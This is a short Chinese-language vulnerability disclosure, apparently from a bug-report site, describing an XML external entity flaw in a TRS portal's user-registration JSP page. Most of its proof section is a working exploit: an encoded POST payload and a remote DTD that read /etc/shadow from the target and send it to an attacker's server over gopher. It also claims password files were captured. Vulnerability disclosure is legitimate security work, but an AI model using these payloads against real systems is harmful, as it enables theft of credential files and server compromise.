### 简要描述:
对外部实体调用检查不严格导致可解析外部实体
### 详细说明:
TRS portal个性化门户http://XX.XX.XX.XX/portal/auth/reg_newuser_dowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件。
### 漏洞证明:
漏洞利用过程:http://XX.XX.XX.XX/portal/auth/reg_newuser_dowith.jsp
POST请求:
```
ObjectXML=<%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f><!DOCTYPE%20root%20%5B%0d%0a%20%20<!ENTITY%20%25%20remote%20SYSTEM%20%22http://远程公网ip地址/poc.xml%22>%0d%0a%20%20%25remote;%0d%0a%5D>%0d%0a</root>
```
poc.xml读取目标机上的shadow文件,并写入网站日志中:
```
<!ENTITY % payload SYSTEM "file:///etc/shadow">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'gopher://远程公网ip地址:80/1%payload;'>">%int; %trick;
```
我们远程服务器日志中获取到的shadow及passwd文件:
[<img src="https://images.seebug.org/upload/201511/0422313048b6520693a38c0c3c057bda451d7f74.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/0422313048b6520693a38c0c3c057bda451d7f74.png)
京公网安备 11010502034610号
暂无评论